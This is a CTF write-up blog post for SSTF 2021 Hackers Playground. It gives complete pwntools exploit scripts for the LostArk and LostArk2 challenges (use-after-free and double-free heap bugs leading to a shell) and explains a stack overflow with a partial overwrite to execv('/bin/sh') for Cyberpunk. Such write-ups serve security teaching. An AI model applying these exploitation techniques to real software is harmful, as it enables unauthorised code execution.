CTF Write-Up
[SSTF 2021] Hackers Playground Writeup
bjloed
2021. 8. 18. 02:22
🧡 LostArk
Simple UAF problem 😉
from pwn import *
context.log_level = 'debug'
#p = process('./lostark')
p = remote('lostark.sstf.site', 1337)
def create(idx, name):
p.sendlineafter(':', '1')
p.sendlineafter(':', str(idx))
if idx == 7:
return
else:
p.sendlineafter(':', name)
def delete(idx):
p.sendlineafter(':', '2')
p.sendlineafter(':', str(idx))
def choose(idx):
p.sendlineafter(':', '4')
p.sendlineafter(':', str(idx))
def set_skill(idx):
p.sendlineafter(':', '5')
p.sendlineafter(':', str(idx))
def use_skill():
p.sendlineafter(':', '6')
create(7, None)
delete(0)
create(1, 'AAAA')
choose(0)
use_skill()
p.interactive()
🧡 LostArk2
Use of careless shared pointers problem! & UAF & DFB
from pwn import *
context.log_level = 'debug'
#p = process('./patch')
p = remote('lostark2.sstf.site', 1337)
def create(idx, name):
p.sendlineafter(':', '1')
p.sendlineafter(':', str(idx))
if idx == 7:
return
else:
p.sendlineafter(':', name)
def delete(idx):
p.sendlineafter(':', '2')
p.sendlineafter(':', str(idx))
def choose(idx):
p.sendlineafter(':', '4')
p.sendlineafter(':', str(idx))
def set_skill(idx):
p.sendlineafter(':', '5')
p.sendlineafter(':', str(idx))
def use_skill():
p.sendlineafter(':', '6')
create(1, 'AAAA')
choose(0)
set_skill(1)
delete(0)
create(7, None)
create(2, 'BBBB')
choose(0)
use_skill()
p.interactive()
🧡 Cyberpunk
조이스틱으로 게임을 하는 컨셉인데 화면에 나와있는 오프셋들을 고르면 rbp-0x8에 그 값이 들어간다. 언뜻 보면 최대 8칸 까지처럼 보이나, 계속해서 값을 넣으면 overflow가 발생한다. 해당 바이너리에는 PIE가 걸려있으므로 RET와 execv 함수의 주소가 하위 2byte만 차이난다는 것을 고려하여 문제를 해결하면 된다. 따로 페이로드는 없다.
void FUN_00100dca(long param_1)
{
byte bVar1;
uint uVar2;
int iVar3;
code *pcVar4;
int local_20;
int local_1c;
local_20 = 0;
while (local_20 < 6) {
local_1c = 0;
while (local_1c < 6) {
do {
uVar2 = rand();
if ((uVar2 & 1) == 0) {
pcVar4 = system;
}
else {
pcVar4 = FUN_00100b5a; // execv("/bin/sh")
}
iVar3 = rand();
bVar1 = (byte)(iVar3 >> 0x37);
*(char *)(param_1 + (local_1c + local_20 * 6)) =
(char)((long)pcVar4 >>
((((char)iVar3 + (bVar1 >> 5) & 7) - (bVar1 >> 5)) * '\b' & 0x3f));
} while (*(char *)(param_1 + (local_1c + local_20 * 6)) == '\0');
local_1c = local_1c + 1;
}
local_20 = local_20 + 1;
}
return;
}⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣿⣿⠿⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⠴⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⣶⡿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⣀⣀⡀⠀⣠⣾⡿⠋⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⡄⠀⠀⢀⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣤⡄⠀⠀⠀⢀⣀⣤⡶⠊⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣴⣾⡿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⢀⣤⣾⡿⠋⢀⣴⣿⠛⠛⠛⢻⣿⣿⢧⣴⣿⠛⠛⠛⠀⠀⠀⠀⣸⡿⠉⠉⠉⠉⠉⠉⣉⣹⣿⣿⡿⠧⠀⠀⢠⣿⡟⠛⠛⠛⠛⠛⠛⠉⣉⣭⣿⡿⠟⠃⠀⣠⡾⠃⢠⣾⡄⠀⠀⠀⣾⡟⠀⣠⣿⡟⠀⣠⣤⡶⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢀⣀⣀⣠⣄⣍⣉⣉⣁⣄⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣴⣿⣦⡀⠙⠷⠶⣟⣛⠛⠀⣐⣛⠛⠁⢀⣀⣚⠛⠋⢁⠺⠿⠟⠛⠛⠛⠉⠁⠀⣠⣿⣷⣤⣤⣶⣾⠿⠟⠛⠉⠁⠀⠀⠀⠀⣠⣿⠿⠀⣀⣀⣤⣴⡾⠿⠛⢉⣩⠀⠀⠀⢀⣴⡿⠃⢠⣿⣿⣿⠀⢀⣾⠏⠀⣀⣉⡹⡻⣿⣯⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠐⠛⢿⣿⣿⣿⠾⠿⠿⠿⠿⠿⠿⠿⠖⠓⠛⠛⠛⠛⠛⠛⠉⠉⠉⠀⠀⣀⣘⠟⠃⠠⠾⡟⢃⠤⠶⠿⠋⠁⠀⠐⠁⠀⣠⢤⡴⢆⡐⠶⠀⢠⣿⠛⠙⠛⢿⣿⣿⣖⣦⣄⣀⠀⠀⢀⣤⣶⣿⣿⠿⠟⠋⠉⠉⠀⠀⠀⢠⣻⠃⠀⣀⣶⣾⡿⠀⣐⣛⠋⠀⣻⣶⣾⠛⠀⢸⣿⠏⠀⠈⠛⠻⣿⠗⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⡿⠋⠀⠼⠿⠿⠛⠉⠉⠁⠀⠀⠀⠀⠙⠛⠉⠀⠀⠀⠀⠀⠀⣠⣿⠏⠀⠀⠀⠀⠀⠉⠛⠛⠿⢿⣿⠗⠀⢸⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⠔⠋⠀⡛⡟⠀⠐⠛⠃⠀⠀⠘⠛⠃⠀⠀⠤⠋⠀⠀⠀⠀⠀⠀⠈⠒⠢⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣰⣿⠋⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠄⡀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠂⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠒⠄
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
[ 00 00 00 00 00 00 00 00 ]
┌───┐
┤#F4├──E3───7F───5A───E3───E3─
└───┘
5A E8 D0 55 5A 74
D0 F4 5A E8 55 E8
D0 98 E3 5A 74 6B
7F E3 E3 6B 7F D0
74 74 F4 98 7F 55
$>